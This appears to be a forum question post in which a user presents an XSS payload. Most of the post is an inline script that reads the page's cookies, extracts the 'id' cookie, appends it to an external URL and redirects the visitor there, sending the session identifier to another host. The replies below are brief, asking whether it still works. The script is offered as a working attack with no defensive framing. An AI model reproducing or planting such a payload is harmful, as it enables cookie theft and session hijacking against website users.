|
Here's that XSS vulnerability I was talking about. --CS <script language="JavaScript">var lkj = document.cookie; function getCookie(name) { var index = lkj.indexOf(name + "="); if (index == -1) return null; index = lkj.indexOf("=", index) + 1; var endstr = lkj.indexOf(";", index); if (endstr == -1) endstr = lkj.length; return unescape(lkj.substring(index, endstr)); } var a = getCookie('id');var b = '[Link](Mouse over link to see full location) c = b+a; window.location=c;</script>
[ ] Want to answer more questions in the Technology category? Maybe give some free advice about: Internet & Web Design?
This must have posted after a 7 day period of being unanswered in spacefem's inbox. Feel free to disregard/remove this question. ]
I don't think it's vulnerabling anymore. Where is it working? ]
WHAT DID YOU WRITE ??????????????????????????????????????????????????????????????????????????????? ]
yup. ]
More Questions: |